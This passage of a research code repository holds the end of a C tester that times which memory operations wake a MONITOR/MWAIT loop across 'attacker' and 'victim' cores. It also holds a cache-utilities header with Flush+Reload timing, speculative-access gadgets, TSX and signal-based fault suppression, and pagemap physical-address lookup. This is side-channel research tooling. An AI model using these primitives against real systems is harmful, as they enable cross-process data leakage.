249 |     {.trigger = write_alias, .name = "Write alias"},
250 |     {.trigger = write_dpm, .name = "Write DPM"},
251 |     {.trigger = write_other_dpm, .name = "Write unrelated DPM"},
252 |     {.trigger = write_spec_addr, .name = "Write speculatively"},
253 |     {.trigger = write_spec_alias, .name = "Write alias speculatively"},
254 |     {.trigger = write_spec_dpm, .name = "Write DPM speculatively"},
255 |     {.trigger = write_spec_other_dpm, .name = "Write unrelated DPM speculatively"},
256 |     {.trigger = write_fault_addr, .name = "Write after fault"},
257 |     {.trigger = flush_addr, .name = "Flush"},
258 |     {.trigger = flush_alias, .name = "Flush alias"},
259 |     {.trigger = flush_dpm, .name = "Flush DPM"},
260 |     {.trigger = flush_dpm, .name = "Flush unrelated DPM"},
261 |     {.trigger = flushopt_dpm, .name = "FlushOpt DPM"},
262 |     {.trigger = write_addr, .name = "Write UC", .setup = mark_uc, .teardown = mark_wb},
263 |     {.trigger = write_spec_addr, .name = "Write UC speculatively", .setup = mark_uc, .teardown = mark_wb},
264 |     {.trigger = write_alias, .name = "Write alias w/ monitored address UC", .setup = mark_uc, .teardown = mark_wb},
265 |     {.trigger = write_spec_alias, .name = "Write alias speculatively w/ monitored address UC", .setup = mark_uc, .teardown = mark_wb},
266 |     {.trigger = flush_addr, .name = "Flush UC", .setup = mark_uc, .teardown = mark_wb},
267 |     {.trigger = clwb_addr, .name = "CLWB", .check = clwb_check},
268 |     {.trigger = clwb_alias, .name = "CLWB alias", .check = clwb_check},
269 |     {.trigger = clwb_dpm, .name = "CLWB DPM", .check = clwb_check},
270 |     {.trigger = clzero_addr, .name = "CLZERO", .check = clzero_check},
271 |     {.trigger = clzero_alias, .name = "CLZERO alias", .check = clzero_check},
272 |     {.trigger = clzero_dpm, .name = "CLZERO DPM", .check = clzero_check},
273 |     {.trigger = clzero_addr, .name = "CLZERO R/O", .setup = mark_ro, .teardown = mark_rw},
274 |     {.trigger = prefetchw_addr, .name = "PREFETCHW"},
275 |     {.trigger = prefetchw_alias, .name = "PREFETCHW alias"},
276 |     {.trigger = prefetchw_dpm, .name = "PREFETCHW DPM"},
277 |     {.trigger = prefetchw_addr, .name = "PREFETCHW R/O", .setup = mark_ro, .teardown = mark_rw},
278 | };
279 | 
280 | volatile int testcase = 0, triggering = 0;
281 | 
282 | void* keystroke_thread(void* dummy) {
283 |     pin_to_core(CORE_ATTACKER);
284 |     printf("[~] Waiting for start (PID: %d)\n", getpid());
285 |     test[OFFSET] = 1;
286 | 
287 |     size_t p = get_physical_address(test);
288 |     if(p < 4096) {
289 |             printf("Could not get physical address\n");
290 |             exit(1);
291 |     }
292 |     size_t phys = p + DPM;
293 |     size_t alias = ptedit_pmap(p, 4096);
294 |     printf("Test: 0x%016zx\nPhys: 0x%016zx\nDPM:  0x%016zx\n2nd:  0x%016zx\n\n", test + OFFSET, p + OFFSET, phys + OFFSET, alias + OFFSET);
295 | 
296 |     while(1) {
297 |         while(!triggering);
298 |         printf("[+] Do the access!\n");
299 |         asm volatile("mfence");
300 |         size_t c = 0;
301 |         while(triggering) {
302 |             if(!setjmp(trycatch_buf)) {
303 |                 tests[testcase].trigger(test + OFFSET, alias + OFFSET, phys + OFFSET);
304 |             }
305 |         }
306 |         asm volatile("mfence");
307 |     }
308 | 
309 | }
310 | 
311 | volatile size_t cnt = 0, cnt_carry = 0;
312 | volatile size_t sum_no_trigger = 0, sum_trigger = 0, samples = 0;
313 | 
314 | void sigalarm(int num) {
315 |     if(samples == 0) {
316 |         do {
317 |             printf("Testing: '%s'\n", tests[testcase].name);
318 |             if(tests[testcase].setup) tests[testcase].setup();
319 |         } while(0);
320 |     }
321 |     printf("    Count: %zd (Carry: %zd)\n", cnt, cnt_carry);
322 |     if(samples && samples < AVG_NO_TRIGGER) {
323 |         sum_no_trigger += cnt;
324 |     }
325 |     if(samples > AVG_NO_TRIGGER) {
326 |         triggering = 1;
327 |     }
328 |     if(samples > AVG_NO_TRIGGER + SKIP_TRIGGER && samples < AVG_NO_TRIGGER + SKIP_TRIGGER + AVG_TRIGGER) {
329 |         sum_trigger += cnt;
330 |     } 
331 |     if(samples > AVG_NO_TRIGGER + SKIP_TRIGGER + AVG_TRIGGER) {
332 |         samples = 0;
333 |         printf("No trigger: %zd\n", sum_no_trigger / AVG_NO_TRIGGER);
334 |         printf("   trigger: %zd\n", sum_trigger / AVG_TRIGGER);
335 |         printf("\n");
336 |         if((sum_trigger / AVG_TRIGGER) > 2 * (sum_no_trigger / AVG_NO_TRIGGER)) tests[testcase].success = 1;
337 |         triggering = 0;
338 |         sum_no_trigger = 0;
339 |         sum_trigger = 0;
340 |         if(tests[testcase].teardown) tests[testcase].teardown();
341 |         do {
342 |             testcase++;
343 |             if(testcase >= sizeof(tests) / sizeof(tests[0])) {
344 |                 printf("\n==================================================================\n\n");
345 |                 printf("Working triggers for %s:\n", INSTR_NAME);
346 |                 for(int i = 0; i < testcase; i++) {
347 |                     if(tests[i].success) {
348 |                         printf(" + %s\n", tests[i].name);
349 |                     }
350 |                 }
351 |                 exit(0);
352 |             }
353 |         } while(!tests[testcase].execute);
354 |     } else {
355 |         samples++;
356 |     }
357 |     
358 |     cnt = 0;
359 |     cnt_carry = 0;
360 | }
361 | 
362 | size_t monitor_mwait(){
363 |     size_t a = 0, d = 0, carry = 0;
364 |     INSTR_MONITOR
365 |     asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
366 |     a = (d << 32) | a;
367 |     asm volatile("mfence");
368 |     size_t wakeup = a + 50000;
369 |     asm volatile("mwait; jnc 1f; inc %0; 1: nop" : "=r"(carry) : "a"(0), "b"(wakeup & 0xffffffff), "d"((wakeup >> 32)), "c"(2));
370 | 
371 |     return carry;
372 | }
373 | 
374 | int main(int argc, char *argv[]) {
375 | #ifdef MONITOR_INTEL
376 |     if (r0e_init()) {
377 |         printf("Could not initialize r0e\n");
378 |         return 1;
379 |     }
380 | #else
381 |     if(ptedit_init()) {
382 |         printf("Could not initialize PTEditor\n");
383 |         return 1;
384 |     }
385 | #endif
386 |     
387 |     pthread_t p;
388 |     pthread_create(&p, NULL, keystroke_thread, NULL);
389 |     sched_yield();
390 | 
391 |     pin_to_core(CORE_VICTIM);
392 | 
393 |     for(int testcase = 0; testcase < sizeof(tests) / sizeof(tests[0]); testcase++) {
394 |         if(tests[testcase].check) {
395 |             tests[testcase].execute = can_execute(tests[testcase].check);
396 |         } else {
397 |             tests[testcase].execute = 1;
398 |         }
399 |     }
400 |     
401 |     
402 |     memset(test, 1, sizeof(test));
403 |     signal(SIGALRM, sigalarm);
404 |     setitimer(ITIMER_REAL, &timer, NULL);
405 |     signal(SIGSEGV, trycatch_segfault_handler);
406 | 
407 |     while(1) {
408 | 
409 | #ifdef MONITOR_INTEL
410 |         cnt_carry += r0e_call(monitor_mwait);
411 | #else
412 |         INSTR_MONITOR
413 |         size_t carry = 0;
414 |         INSTR_WAIT
415 |         cnt_carry += carry;
416 | #endif
417 |         cnt++;
418 |     }
419 | 
420 | 
421 |     return 0;
422 | }
423 | 
424 | 


--------------------------------------------------------------------------------
/spectral/cacheutils.h:
--------------------------------------------------------------------------------
  1 | #ifndef _CACHEUTILS_H_
  2 | #define _CACHEUTILS_H_
  3 | 
  4 | #include <assert.h>
  5 | #include <unistd.h>
  6 | #include <sys/syscall.h>
  7 | #include <linux/perf_event.h>
  8 | #include <sys/ioctl.h>
  9 | #include <stdio.h>
 10 | #include <stdint.h>
 11 | #include <signal.h>
 12 | #include <setjmp.h>
 13 | 
 14 | #define ARM_PERF            1
 15 | #define ARM_CLOCK_MONOTONIC 2
 16 | #define ARM_TIMER           3
 17 | 
 18 | /* ============================================================
 19 |  *                    User configuration
 20 |  * ============================================================ */
 21 | size_t CACHE_MISS = 150;
 22 | 
 23 | #define USE_RDTSC_BEGIN_END     0
 24 | 
 25 | #define USE_RDTSCP              1
 26 | 
 27 | #define ARM_CLOCK_SOURCE        ARM_CLOCK_MONOTONIC
 28 | 
 29 | /* ============================================================
 30 |  *                  User configuration End
 31 |  * ============================================================ */
 32 | 
 33 | 
 34 | // ---------------------------------------------------------------------------
 35 | static size_t perf_fd;
 36 | void perf_init() {
 37 |   static struct perf_event_attr attr;
 38 |   attr.type = PERF_TYPE_HARDWARE;
 39 |   attr.config = PERF_COUNT_HW_CPU_CYCLES;
 40 |   attr.size = sizeof(attr);
 41 |   attr.exclude_kernel = 1;
 42 |   attr.exclude_hv = 1;
 43 | #if !defined(__i386__)
 44 |   attr.exclude_callchain_kernel = 1;
 45 | #endif
 46 | 
 47 |   perf_fd = syscall(__NR_perf_event_open, &attr, 0, -1, -1, 0);
 48 |   assert(perf_fd >= 0);
 49 | 
 50 |   // ioctl(perf_fd, PERF_EVENT_IOC_RESET, 0);
 51 | }
 52 | 
 53 | #if defined(__x86_64__)
 54 | // ---------------------------------------------------------------------------
 55 | uint64_t rdtsc() {
 56 |   uint64_t a, d;
 57 |   asm volatile("mfence");
 58 | #if USE_RDTSCP
 59 |   asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
 60 | #else
 61 |   asm volatile("rdtsc" : "=a"(a), "=d"(d));
 62 | #endif
 63 |   a = (d << 32) | a;
 64 |   asm volatile("mfence");
 65 |   return a;
 66 | }
 67 | 
 68 | // ---------------------------------------------------------------------------
 69 | uint64_t rdtsc_begin() {
 70 |   uint64_t a, d;
 71 |   asm volatile ("mfence\n\t"
 72 |     "CPUID\n\t"
 73 |     "RDTSCP\n\t"
 74 |     "mov %%rdx, %0\n\t"
 75 |     "mov %%rax, %1\n\t"
 76 |     "mfence\n\t"
 77 |     : "=r" (d), "=r" (a)
 78 |     :
 79 |     : "%rax", "%rbx", "%rcx", "%rdx");
 80 |   a = (d<<32) | a;
 81 |   return a;
 82 | }
 83 | 
 84 | // ---------------------------------------------------------------------------
 85 | uint64_t rdtsc_end() {
 86 |   uint64_t a, d;
 87 |   asm volatile("mfence\n\t"
 88 |     "RDTSCP\n\t"
 89 |     "mov %%rdx, %0\n\t"
 90 |     "mov %%rax, %1\n\t"
 91 |     "CPUID\n\t"
 92 |     "mfence\n\t"
 93 |     : "=r" (d), "=r" (a)
 94 |     :
 95 |     : "%rax", "%rbx", "%rcx", "%rdx");
 96 |   a = (d<<32) | a;
 97 |   return a;
 98 | }
 99 | 
100 | // ---------------------------------------------------------------------------
101 | void flush(void *p) { asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax"); }
102 | 
103 | // ---------------------------------------------------------------------------
104 | void maccess(void *p) { asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); }
105 | 
106 | // ---------------------------------------------------------------------------
107 | void mfence() { asm volatile("mfence"); }
108 | 
109 | // ---------------------------------------------------------------------------
110 | void nospec() { asm volatile("lfence"); }
111 | 
112 | #include <cpuid.h>
113 | // ---------------------------------------------------------------------------
114 | unsigned int xbegin() {
115 |   unsigned status;
116 |   asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00" : "=a"(status) : "a"(-1UL) : "memory");
117 |   return status;
118 | }
119 | 
120 | // ---------------------------------------------------------------------------
121 | void xend() {
122 |   asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
123 | }
124 | 
125 | // ---------------------------------------------------------------------------
126 | int has_tsx() {
127 |   if (__get_cpuid_max(0, NULL) >= 7) {
128 |     unsigned a, b, c, d;
129 |     __cpuid_count(7, 0, a, b, c, d);
130 |     return (b & (1 << 11)) ? 1 : 0;
131 |   } else {
132 |     return 0;
133 |   }
134 | }
135 | 
136 | // ---------------------------------------------------------------------------
137 | void maccess_tsx(void* ptr) {
138 |     if (xbegin() == (~0u)) {
139 |         maccess(ptr);
140 |         xend();
141 |     }
142 | }
143 | 
144 | #define speculation_start(label) asm goto ("call %l0" : : : : label##_retp); 
145 | #define speculation_end(label) asm goto("jmp %l0" : : : : label); label##_retp: asm goto("lea %l0(%%rip), %%rax\nmovq %%rax, (%%rsp)\nret\n" : : : "rax" : label); label: asm volatile("nop");
146 | 
147 | 
148 | #elif defined(__i386__)
149 | // ---------------------------------------------------------------------------
150 | uint32_t rdtsc() {
151 |   uint32_t a, d;
152 |   asm volatile("mfence");
153 | #if USE_RDTSCP
154 |   asm volatile("rdtscp" : "=a"(a), "=d"(d));
155 | #else
156 |   asm volatile("rdtsc" : "=a"(a), "=d"(d));
157 | #endif
158 |   asm volatile("mfence");
159 |   return a;
160 | }
161 | 
162 | // ---------------------------------------------------------------------------
163 | void flush(void *p) { asm volatile("clflush 0(%0)\n" : : "c"(p)); }
164 | 
165 | // ---------------------------------------------------------------------------
166 | void maccess(void *p) { asm volatile("mov (%0), %%eax\n" : : "c"(p) : "eax"); }
167 | 
168 | // ---------------------------------------------------------------------------
169 | void mfence() { asm volatile("mfence"); }
170 | 
171 | // ---------------------------------------------------------------------------
172 | void nospec() { asm volatile("lfence"); }
173 | 
174 | #include <cpuid.h>
175 | // ---------------------------------------------------------------------------
176 | int has_tsx() {
177 |   if (__get_cpuid_max(0, NULL) >= 7) {
178 |     unsigned a, b, c, d;
179 |     __cpuid_count(7, 0, a, b, c, d);
180 |     return (b & (1 << 11)) ? 1 : 0;
181 |   } else {
182 |     return 0;
183 |   }
184 | }
185 | 
186 | #elif defined(__aarch64__)
187 | #if ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
188 | #include <time.h>
189 | #endif
190 | 
191 | // ---------------------------------------------------------------------------
192 | uint64_t rdtsc() {
193 | #if ARM_CLOCK_SOURCE == ARM_PERF
194 |   long long result = 0;
195 | 
196 |   asm volatile("DSB SY");
197 |   asm volatile("ISB");
198 | 
199 |   if (read(perf_fd, &result, sizeof(result)) < (ssize_t) sizeof(result)) {
200 |     return 0;
201 |   }
202 | 
203 |   asm volatile("ISB");
204 |   asm volatile("DSB SY");
205 | 
206 |   return result;
207 | #elif ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
208 |   asm volatile("DSB SY");
209 |   asm volatile("ISB");
210 |   struct timespec t1;
211 |   clock_gettime(CLOCK_MONOTONIC, &t1);
212 |   uint64_t res = t1.tv_sec * 1000 * 1000 * 1000ULL + t1.tv_nsec;
213 |   asm volatile("ISB");
214 |   asm volatile("DSB SY");
215 |   return res;
216 | #elif ARM_CLOCK_SOURCE == ARM_TIMER
217 |   uint64_t result = 0;
218 | 
219 |   asm volatile("DSB SY");
220 |   asm volatile("ISB");
221 |   asm volatile("MRS %0, PMCCNTR_EL0" : "=r"(result));
222 |   asm volatile("DSB SY");
223 |   asm volatile("ISB");
224 | 
225 |   return result;
226 | #else
227 | #error Clock source not supported
228 | #endif
229 | }
230 | // ---------------------------------------------------------------------------
231 | uint64_t rdtsc_begin() {
232 | #if ARM_CLOCK_SOURCE == ARM_PERF
233 |   long long result = 0;
234 | 
235 |   asm volatile("DSB SY");
236 |   asm volatile("ISB");
237 | 
238 |   if (read(perf_fd, &result, sizeof(result)) < (ssize_t) sizeof(result)) {
239 |     return 0;
240 |   }
241 | 
242 |   asm volatile("DSB SY");
243 | 
244 |   return result;
245 | #elif ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
246 |   asm volatile("DSB SY");
247 |   asm volatile("ISB");
248 |   struct timespec t1;
249 |   clock_gettime(CLOCK_MONOTONIC, &t1);
250 |   uint64_t res = t1.tv_sec * 1000 * 1000 * 1000ULL + t1.tv_nsec;
251 |   asm volatile("DSB SY");
252 |   return res;
253 | #elif ARM_CLOCK_SOURCE == ARM_TIMER
254 |   uint64_t result = 0;
255 | 
256 |   asm volatile("DSB SY");
257 |   asm volatile("ISB");
258 |   asm volatile("MRS %0, PMCCNTR_EL0" : "=r"(result));
259 |   asm volatile("ISB");
260 | 
261 |   return result;
262 | #else
263 | #error Clock source not supported
264 | #endif
265 | }
266 | 
267 | 
268 | // ---------------------------------------------------------------------------
269 | uint64_t rdtsc_end() {
270 | #if ARM_CLOCK_SOURCE == ARM_PERF
271 |   long long result = 0;
272 | 
273 |   asm volatile("DSB SY");
274 | 
275 |   if (read(perf_fd, &result, sizeof(result)) < (ssize_t) sizeof(result)) {
276 |     return 0;
277 |   }
278 | 
279 |   asm volatile("ISB");
280 |   asm volatile("DSB SY");
281 | 
282 |   return result;
283 | #elif ARM_CLOCK_SOURCE == ARM_CLOCK_MONOTONIC
284 |   asm volatile("DSB SY");
285 |   struct timespec t1;
286 |   clock_gettime(CLOCK_MONOTONIC, &t1);
287 |   uint64_t res = t1.tv_sec * 1000 * 1000 * 1000ULL + t1.tv_nsec;
288 |   asm volatile("ISB");
289 |   asm volatile("DSB SY");
290 |   return res;
291 | #elif ARM_CLOCK_SOURCE == ARM_TIMER
292 |   uint64_t result = 0;
293 | 
294 |   asm volatile("DSB SY");
295 |   asm volatile("MRS %0, PMCCNTR_EL0" : "=r"(result));
296 |   asm volatile("DSB SY");
297 |   asm volatile("ISB");
298 | 
299 |   return result;
300 | #else
301 | #error Clock source not supported
302 | #endif
303 | }
304 | 
305 | // ---------------------------------------------------------------------------
306 | void flush(void *p) {
307 |   asm volatile("DC CIVAC, %0" ::"r"(p));
308 |   asm volatile("DSB ISH");
309 |   asm volatile("ISB");
310 | }
311 | 
312 | // ---------------------------------------------------------------------------
313 | void maccess(void *p) {
314 |   volatile uint32_t value;
315 |   asm volatile("LDR %0, [%1]\n\t" : "=r"(value) : "r"(p));
316 |   asm volatile("DSB ISH");
317 |   asm volatile("ISB");
318 | }
319 | 
320 | // ---------------------------------------------------------------------------
321 | void mfence() { asm volatile("DSB ISH"); }
322 | 
323 | // ---------------------------------------------------------------------------
324 | void nospec() { asm volatile("DSB SY\nISB"); }
325 | 
326 | #elif defined(__PPC64__)
327 | #include <sys/platform/ppc.h>
328 | uint64_t rdtsc() {
329 |   uint64_t time;
330 |   asm volatile ("mfspr %0, 268\n\t"
331 |                 "lwsync\n\t" : "=r" (time));
332 | 
333 |   return time;
334 | }
335 | 
336 | // ---------------------------------------------------------------------------
337 | uint64_t rdtsc_begin() {
338 |   uint64_t time;
339 |   asm volatile ("mfspr %0, 268\n\t"
340 |                 "lwsync\n\t" : "=r" (time));
341 | 
342 |   return time;
343 | }
344 | 
345 | // ---------------------------------------------------------------------------
346 | uint64_t rdtsc_end() {
347 |   uint64_t time;
348 |   asm volatile ("mfspr %0, 268\n\t"
349 |                 "lwsync\n\t" : "=r" (time));
350 | 
351 |   return time;
352 | }
353 | 
354 | // ---------------------------------------------------------------------------
355 | void flush(void *p) { asm volatile( "dcbf 0, %0\n\t"
356 | 				    "dcs\n\t"
357 | 				    "ics\n\t"
358 | 				    :  : "r"(p) : ); }
359 | 
360 | // ---------------------------------------------------------------------------
361 | void maccess(void *p) { asm volatile( "ld %%r0, 0(%0)" ::"r"(p): "r0"); }
362 | 
363 | // ---------------------------------------------------------------------------
364 | void mfence() { asm volatile( "lwsync" ); }
365 | 
366 | // ---------------------------------------------------------------------------
367 | void nospec() { asm volatile( "hwsync" ); }
368 | #endif
369 | 
370 | // ---------------------------------------------------------------------------
371 | int flush_reload(void *ptr) {
372 | #if defined(__i386__)
373 |   uint32_t start = 0, end = 0;
374 | #else
375 |   uint64_t start = 0, end = 0;
376 | #endif
377 | 
378 | #if USE_RDTSC_BEGIN_END
379 |   start = rdtsc_begin();
380 | #else
381 |   start = rdtsc();
382 | #endif
383 |   maccess(ptr);
384 | #if USE_RDTSC_BEGIN_END
385 |   end = rdtsc_end();
386 | #else
387 |   end = rdtsc();
388 | #endif
389 | 
390 |   mfence();
391 | 
392 |   flush(ptr);
393 | 
394 |   if (end - start < CACHE_MISS) {
395 |     return 1;
396 |   }
397 |   return 0;
398 | }
399 | 
400 | // ---------------------------------------------------------------------------
401 | int flush_reload_t(void *ptr) {
402 | #if defined(__i386__)
403 |   uint32_t start = 0, end = 0;
404 | #else
405 |   uint64_t start = 0, end = 0;
406 | #endif
407 | 
408 | #if USE_RDTSC_BEGIN_END
409 |   start = rdtsc_begin();
410 | #else
411 |   start = rdtsc();
412 | #endif
413 |   maccess(ptr);
414 | #if USE_RDTSC_BEGIN_END
415 |   end = rdtsc_end();
416 | #else
417 |   end = rdtsc();
418 | #endif
419 | 
420 |   mfence();
421 | 
422 |   flush(ptr);
423 | 
424 |   return (int)(end - start);
425 | }
426 | 
427 | // ---------------------------------------------------------------------------
428 | int reload_t(void *ptr) {
429 | #if defined(__i386__)
430 |   uint32_t start = 0, end = 0;
431 | #else
432 |   uint64_t start = 0, end = 0;
433 | #endif
434 | 
435 | #if USE_RDTSC_BEGIN_END
436 |   start = rdtsc_begin();
437 | #else
438 |   start = rdtsc();
439 | #endif
440 |   maccess(ptr);
441 | #if USE_RDTSC_BEGIN_END
442 |   end = rdtsc_end();
443 | #else
444 |   end = rdtsc();
445 | #endif
446 | 
447 |   mfence();
448 | 
449 |   return (int)(end - start);
450 | }
451 | 
452 | 
453 | // ---------------------------------------------------------------------------
454 | size_t detect_flush_reload_threshold() {
455 |   size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
456 |   size_t dummy[16];
457 |   size_t *ptr = dummy + 8;
458 | #if defined(__i386__)
459 |   uint32_t start = 0, end = 0;
460 | #else
461 |   uint64_t start = 0, end = 0;
462 | #endif
463 | 
464 |   maccess(ptr);
465 |   for (i = 0; i < count; i++) {
466 |     reload_time += reload_t(ptr);
467 |   }
468 |   for (i = 0; i < count; i++) {
469 |     flush_reload_time += flush_reload_t(ptr);
470 |   }
471 |   reload_time /= count;
472 |   flush_reload_time /= count;
473 | 
474 |   return (flush_reload_time + reload_time * 2) / 3;
475 | }
476 | 
477 | // ---------------------------------------------------------------------------
478 | void maccess_speculative(void* ptr) {
479 |     int i;
480 |     size_t dummy = 0;
481 |     void* addr;
482 | 
483 |     for(i = 0; i < 50; i++) {
484 |         size_t c = ((i * 167) + 13) & 1;
485 |         addr = (void*)(((size_t)&dummy) * c + ((size_t)ptr) * (1 - c));
486 |         flush(&c);
487 |         mfence();
488 |         if(c / 0.5 > 1.1) maccess(addr);
489 |     }
490 | }
491 | 
492 | // ---------------------------------------------------------------------------
493 | static jmp_buf trycatch_buf;
494 | 
495 | // ---------------------------------------------------------------------------
496 | void unblock_signal(int signum __attribute__((__unused__))) {
497 |   sigset_t sigs;
498 |   sigemptyset(&sigs);
499 |   sigaddset(&sigs, signum);
500 |   sigprocmask(SIG_UNBLOCK, &sigs, NULL);
501 | }
502 | 
503 | // ---------------------------------------------------------------------------
504 | void trycatch_segfault_handler(int signum) {
505 |   (void)signum;
506 |   
507 |   int i;
508 |   for(i = 1; i < 32; i++) {
509 |     unblock_signal(i);
510 |   }
511 |   longjmp(trycatch_buf, 1);
512 | }
513 | 
514 | // ---------------------------------------------------------------------------
515 | int try_start() {
516 | #if defined(__i386__) || defined(__x86_64__)
517 |     if(has_tsx()) {
518 |         unsigned status;
519 |         // tsx begin
520 |         asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00"
521 |                  : "=a"(status)
522 |                  : "a"(-1UL)
523 |                  : "memory");
524 |         return status == (~0u);
525 |     } else 
526 | #endif
527 |     {
528 |         int i;
529 |         for(i = 1; i < 32; i++) {
530 |             signal(i, trycatch_segfault_handler); 
531 |         }
532 |         return !setjmp(trycatch_buf);
533 |     }
534 | }
535 | 
536 | // ---------------------------------------------------------------------------
537 | void try_end() {
538 | #if defined(__i386__) || defined(__x86_64__)
539 |     if(!has_tsx()) 
540 | #endif
541 |     {
542 |         int i;
543 |         for(i = 1; i < 32; i++) {
544 |             signal(i, SIG_DFL); 
545 |         }
546 |     }
547 | }
548 | 
549 | // ---------------------------------------------------------------------------
550 | void try_abort() {
551 | #if defined(__i386__) || defined(__x86_64__)
552 |     if(has_tsx()) {
553 |         asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
554 |     } else 
555 | #endif
556 |     {
557 |         maccess(0);
558 |     }
559 | }
560 | 
561 | #endif
562 | 
563 | 
564 | size_t get_physical_address(size_t vaddr) {
565 |     int fd = open("/proc/self/pagemap", O_RDONLY);
566 |     uint64_t virtual_addr = (uint64_t)vaddr;
567 |     size_t value = 0;
568 |     off_t offset = (virtual_addr / 4096) * sizeof(value);
569 |     int got = pread(fd, &value, sizeof(value), offset);
570 |     close(fd);
571 |     return (value << 12) | ((size_t)vaddr & 0xFFFULL);
572 | }
573 | 
574 | 


--------------------------------------------------------------------------------
/trigger-tester/cacheutils.h:
--------------------------------------------------------------------------------
  1 | #ifndef _CACHEUTILS_H_
  2 | #define _CACHEUTILS_H_
  3 | 
  4 | #include <assert.h>
  5 | #include <unistd.h>
  6 | #include <sys/syscall.h>
  7 | #include <linux/perf_event.h>
  8 | #include <sys/ioctl.h>
  9 | #include <stdio.h>
 10 | #include <stdint.h>
 11 | #include <signal.h>
 12 | #include <setjmp.h>
 13 | 
 14 | #define ARM_PERF            1
 15 | #define ARM_CLOCK_MONOTONIC 2
 16 | #define ARM_TIMER           3
 17 | 
 18 | /* ============================================================
 19 |  *                    User configuration
 20 |  * ============================================================ */
 21 | size_t CACHE_MISS = 150;
 22 | 
 23 | #define USE_RDTSC_BEGIN_END     0
 24 | 
 25 | #define USE_RDTSCP              1
 26 | 
 27 | #define ARM_CLOCK_SOURCE        ARM_CLOCK_MONOTONIC
 28 | 
 29 | /* ============================================================
 30 |  *                  User configuration End
 31 |  * ============================================================ */
 32 | 
 33 | 
 34 | // ---------------------------------------------------------------------------
 35 | static size_t perf_fd;
 36 | void perf_init() {
 37 |   static struct perf_event_attr attr;
 38 |   attr.type = PERF_TYPE_HARDWARE;
 39 |   attr.config = PERF_COUNT_HW_CPU_CYCLES;
 40 |   attr.size = sizeof(attr);
 41 |   attr.exclude_kernel = 1;
 42 |   attr.exclude_hv = 1;
 43 | #if !defined(__i386__)
 44 |   attr.exclude_callchain_kernel = 1;
 45 | #endif
 46 | 
 47 |   perf_fd = syscall(__NR_perf_event_open, &attr, 0, -1, -1, 0);
 48 |   assert(perf_fd >= 0);
 49 | 
 50 |   // ioctl(perf_fd, PERF_EVENT_IOC_RESET, 0);
 51 | }
 52 | 
 53 | #if defined(__x86_64__)
 54 | // ---------------------------------------------------------------------------
 55 | uint64_t rdtsc() {
 56 |   uint64_t a, d;
 57 |   asm volatile("mfence");
 58 | #if USE_RDTSCP
 59 |   asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
 60 | #else
 61 |   asm volatile("rdtsc" : "=a"(a), "=d"(d));
 62 | #endif
 63 |   a = (d << 32) | a;
 64 |   asm volatile("mfence");
 65 |   return a;
 66 | }
 67 | 
 68 | // ---------------------------------------------------------------------------
 69 | uint64_t rdtsc_begin() {
 70 |   uint64_t a, d;
 71 |   asm volatile ("mfence\n\t"
 72 |     "CPUID\n\t"
 73 |     "RDTSCP\n\t"
 74 |     "mov %%rdx, %0\n\t"
 75 |     "mov %%rax, %1\n\t"
 76 |     "mfence\n\t"
 77 |     : "=r" (d), "=r" (a)
 78 |     :
 79 |     : "%rax", "%rbx", "%rcx", "%rdx");
 80 |   a = (d<<32) | a;
 81 |   return a;
 82 | }
 83 | 
 84 | // ---------------------------------------------------------------------------
 85 | uint64_t rdtsc_end() {
 86 |   uint64_t a, d;
 87 |   asm volatile("mfence\n\t"
 88 |     "RDTSCP\n\t"
 89 |     "mov %%rdx, %0\n\t"
 90 |     "mov %%rax, %1\n\t"
 91 |     "CPUID\n\t"
 92 |     "mfence\n\t"
 93 |     : "=r" (d), "=r" (a)
 94 |     :
 95 |     : "%rax", "%rbx", "%rcx", "%rdx");
 96 |   a = (d<<32) | a;
 97 |   return a;
 98 | }
 99 | 
100 | // ---------------------------------------------------------------------------
101 | void flush(void *p) { asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax"); }
102 | 
103 | // ---------------------------------------------------------------------------
104 | void maccess(void *p) { asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); }
105 | 
106 | // ---------------------------------------------------------------------------
107 | void mfence() { asm volatile("mfence"); }
108 | 
109 | // ---------------------------------------------------------------------------
110 | void nospec() { asm volatile("lfence"); }
111 | 
112 | #include <cpuid.h>
113 | // ---------------------------------------------------------------------------
114 | unsigned int xbegin() {
115 |   unsigned status;
116 |   asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00" : "=a"(status) : "a"(-1UL) : "memory");
117 |   return status;
118 | }
119 | 
120 | // ---------------------------------------------------------------------------
121 | void xend() {
122 |   asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
123 | }
124 | 
125 | // ---------------------------------------------------------------------------
126 | int has_tsx() {
127 |   if (__get_cpuid_max(0, NULL) >= 7) {
128 |     unsigned a, b, c, d;
129 |     __cpuid_count(7, 0, a, b, c, d);
130 |     return (b & (1 << 11)) ? 1 : 0;
131 |   } else {
132 |     return 0;
133 |   }
134 | }
135 | 
136 | // ---------------------------------------------------------------------------
137 | void maccess_tsx(void* ptr) {
138 |     if (xbegin() == (~0u)) {
139 |         maccess(ptr);
140 |         xend();
141 |     }
142 | }
143 | 
144 | #define speculation_start(label) asm goto ("call %l0" : : : : label##_retp); 
145 | #define speculation_end(label) asm goto("jmp %l0" : : : : label); label##_retp: asm goto("lea %l0(%%rip), %%rax\nmovq %%rax, (%%rsp)\nret\n" : : : "rax" : label); label: asm volatile("nop");
146 | 
147 | 
148 | #elif defined(__i386__)
149 | // ---------------------------------------------------------------------------
150 | uint32_t rdtsc() {
151 |   uint32_t a, d;
152 |   asm volatile("mfence");
153 | #if USE_RDTSCP
154 |   asm volatile("rdtscp" : "=a"(a), "=d"(d));
155 | #else
156 |   asm volatile("rdtsc" : "=a"(a), "=d"(d));
157 | #endif
158 |   asm volatile("mfence");
159 |   return a;
160 | }
161 | 
162 | // ---------------------------------------------------------------------------
